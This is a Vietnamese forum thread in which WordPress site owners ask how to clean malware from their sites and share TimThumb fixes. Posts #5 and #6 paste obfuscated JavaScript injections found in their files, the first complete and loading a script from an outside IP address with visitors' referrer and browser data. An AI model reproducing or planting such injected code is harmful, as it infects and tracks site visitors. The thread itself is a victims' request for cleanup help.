English | Vietnamese
 

banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register   [Login] Loginhttp  | https  ]
 
Forum Index Thảo luận virus, trojan, spyware, worm... Website bị báo Mailware  XML
  [Question]   Website bị báo Mailware 15/02/2012 09:21:05 (+0700) | #1 | 253835
paranoidx
Member
[Minus]    0    [Plus]
Joined: 07/12/2007 10:35:41
Messages: 9
Offline
[Profile] [PM]
Hi bà kon,

Mình ko biết website mình bị gì, chỉ là website doanh nghiệp thôi (wordpress) - không bán sản phẩm và ko có verify sercurity onpage, nhưng hiện tại bị báo là dính Mailware

Mình vào website sáng nay thì bị báo lỗi này :
[url=http://farm8.staticflickr.com/7049/6878931213_5ee625283c_b.jpg]
[/url]

Mình cũng ko chuyên vụ này lắm, bro nào biết, nhờ giúp đỡ mình thông tin giúp.

[Up] [Print Copy]
  [Question]   Website bị báo Mailware 15/02/2012 09:44:10 (+0700) | #2 | 253844
[Avatar]
 vulehcm
Member
[Minus]    0    [Plus]
Joined: 21/11/2011 20:37:50
Messages: 46
Offline
[Profile] [PM]
Site công ty bạn là site nào? Có thể cho xem thông tin website được không? Chỉ đơn giản là một thông báo thế này rất khó tìm hiểu nguyên nhân bên trong.
[Up] [Print Copy]
  [Question]   Website bị báo Mailware 15/02/2012 10:50:44 (+0700) | #3 | 253859
paranoidx
Member
[Minus]    0    [Plus]
Joined: 07/12/2007 10:35:41
Messages: 9
Offline
[Profile] [PM]
Xin cám ơn bạn, do mình sơ suất, là website : www.vubao.com.vn

Tuy nhiên với sự trợ giúp của bên phía hosting (vdata) và bạn mình nên đã xoá được các đoạn mã độc ?!?! trong các file Js.

Nhờ đó mình cũng biết thêm site http://sitecheck.sucuri.net có thể giúp mình check malware hoặc vấn đề có trên website.

Giờ có vẻ an toàn rồi.

Tks bạn đã quan tâm và cùng muốn chia sẽ.
[Up] [Print Copy]
  [Question]   Website bị báo Mailware 15/02/2012 12:02:02 (+0700) | #4 | 253872
n.o.avc
Member
[Minus]    0    [Plus]
Joined: 14/02/2012 22:16:42
Messages: 1
Offline
[Profile] [PM]
Có bị làm sao đâu bạn!Mình vẫn vào được mà!smilie!Bạn nên update chrome lên xem sao!smilie
[Up] [Print Copy]
  [Question]   Website bị báo Mailware 20/02/2012 11:31:13 (+0700) | #5 | 254617
paranoidx
Member
[Minus]    0    [Plus]
Joined: 07/12/2007 10:35:41
Messages: 9
Offline
[Profile] [PM]
HI mọi người,

Bữa nay website của mình lại bị Goolge cảnh báo có malware. www.rainstormfilm.com)

Mình check với công cụ check online : http://sitecheck.sucuri.net/results/www.rainstormfilm.com

Cho kết quả hơi bầm dập :
Known javascript malware.
Details: http://sucuri.net/malware/malware-entry-mwjs69693


Mình tải lên đây 1 trong những file bị malware. Nhờ cao thủ xem giúp.
http://www.rainstormfilm.com/site/wp-content/themes/rainstormfilm/js/superfish.js

Cái malware có định dạng thế này, lần trước là mình đi từng file để xoá, giờ cũng vậy ko lẽ mỗi lần mỗi xoá thì chết :

var _0xa687=["\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x6D\x73\x69\x65","\x69\x6E\x64\x65\x78\x4F\x66","\x6F\x70\x65\x72\x61","\x77\x65\x62\x74\x76","\x77\x69\x6E\x64\x6F\x77\x73","\x61\x68\x6B\x72\x61\x68","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x33\x31\x2E\x31\x38\x34\x2E\x32\x34\x32\x2E\x31\x30\x33\x2F\x73\x2E\x70\x68\x70\x3F\x72\x65\x66\x3D","\x26\x6C\x63\x3D","\x26\x75\x61\x3D","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];var ua=navigator[_0xa687[1]][_0xa687[0]]();if(((ua[_0xa687[3]](_0xa687[2])!=-1&&ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;
[Up] [Print Copy]
  [Question]   Website bị báo Mailware 20/02/2012 14:07:58 (+0700) | #6 | 254641
omaichotnho
Member
[Minus]    0    [Plus]
Joined: 21/09/2010 21:05:22
Messages: 9
Offline
[Profile] [PM]
To: paranoidx
cậu ơi! mình cũng đang xài wordpress và mình cũng bị như của cậu
cậu xử lý thế nào vậy???
mình vào trang web scan của cậu mà nó ko phát hiện ra gì ạh!
Mình vào webmaster tool thì google báo!

<script type='text/javascript'>var a=!1;o_vrg = "\x6C\x6F\x6
E\x6C\x79";if(!document.cookie.match(o_vrg)){if(window.docum
ent)aa=/s/g.exec("s").index+[];aaa='0';if(aa.indexOf(aaa)===
0){ss='';try{if(/12/.exec(23).index==0);}catch(qqq){s=String
;}ee='e';e=window.eval;t='y';}h=2*Math.cos(Math.PI);n=[3.5,3
.5,51.5,50,15,19,49,54.5,48.5,57.5,53.5,49.5,54,57,22,50.5,4
9.5,57,33.5,53,49.5,53.5,49.5,54,57,56.5,32,59.5,41,47.5,50.
5,38,47.5,53.5,49.5,19,18.5,48,54.5,49,59.5,18.5,19.5,44.5,2
3,45.5,19.5,60.5,3.5,3.5,3.5,51.5,50,56,47.5,53.5,49.5,56,19
,19.5,28.5,3.5,3.5,61.5,15,49.5,53,56.5,49.5,15,60.5,3.5,3.5
,3.5,49,54.5,48.5,57.5,53.5,49.5,54,57,22,58.5,56,51.5,57,49
.5,19,16,29,51.5,50,56,47.5,53.5,49.5,15,56.5,56,48.5,29.5,1
8.5,51,57,57,55,28,22.5,22.5,56.5,49.5,53.5,51.5,55,56,54.5,
22,57.5,52.5,22,53.5,54,22.5,51.5,54,22,48.5,50.5,51.5,30.5,
24,18.5,15,58.5,51.5,49,57,51,29.5,18.5,23.5,23,18.5,15,51,4
9.5,51.5,50.5,51,57,29.5,18.5,23.5,23,18.5,15,56.5,57,59.5,5
3,49.5,29.5,18.5,58,51.5,56.5,51.5,48,51.5,53,51.5,57,59.5,2
8,51
[Up] [Print Copy]
  [Question]   Website bị báo Mailware 20/02/2012 14:57:27 (+0700) | #7 | 254645
paranoidx
Member
[Minus]    0    [Plus]
Joined: 07/12/2007 10:35:41
Messages: 9
Offline
[Profile] [PM]
Bạn ơi, hiện tại mình vẫn chưa dứt điểm được, đang sống chung với lũ, cái vụ này là do Timthumb. cần phải update cái file Timthumb mới từ google code.

Cách chỉnh cụ thể có ở đây :
http://www.wpbeginner.com/wp-tutorials/how-to-fix-and-cleanup-the-timthumb-hack-in-wordpress/

Hoặc dùng plugin này của developer trên Wordpress :
http://wordpress.org/extend/plugins/timthumb-vulnerability-scanner/

Hiện tại website mình vẫn truy cập được, nhưng nếu máy tính nào có cài Avast sẽ vẫn báo website mình đang có lây nhiễm malware, ngoài ra check security online cũng báo là có, mình hy vọng bộ quét làm việc tốt sau vài ngày sẽ hết bị.

Hy vọng bạn có thể phần nào hoá giải nỗi lo sợ >.< có cách nào ưu việt hơn thì hỗ trợ mình với nhé.
[Up] [Print Copy]
  [Question]   Website bị báo Mailware 03/03/2012 06:10:13 (+0700) | #8 | 256706
omaichotnho
Member
[Minus]    0    [Plus]
Joined: 21/09/2010 21:05:22
Messages: 9
Offline
[Profile] [PM]
Không được rồi các bác ơi!
mặc dù google webmaster tool không báo gì nữa!
nhưng em đăng nhập web bằng máy tính cái AVG thì máy tính báo vẫn bị virut.
và Bing nó vẫn email thông báo là còn các bác ạh!
Các bác chỉ giúp em cách tìm và diệt 1 cách triệt để trên web được ko?

đây là link em chụp khi vào BING kiểm tra: http://apartment-canho.com/virutbing.jpg
đây là nội dung email BING gửi em:
Dear Webmaster,

This is a daily report on the open issues categories we have detected on your site.
http://apartment-canho.com/
Malware 1

Please visit the Bing Webmaster Tools at your convenience for detailed information.

Thanks,
Bing Webmaster Team

To unsubscribe or change the frequency of this message, please visit the Bing Webmaster Tools to update your preference.
[Up] [Print Copy]
  [Question]   Website bị báo Mailware 07/03/2012 02:34:14 (+0700) | #9 | 257069
omaichotnho
Member
[Minus]    0    [Plus]
Joined: 21/09/2010 21:05:22
Messages: 9
Offline
[Profile] [PM]
KO có ai giúp mình cả!
buồn buồn
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|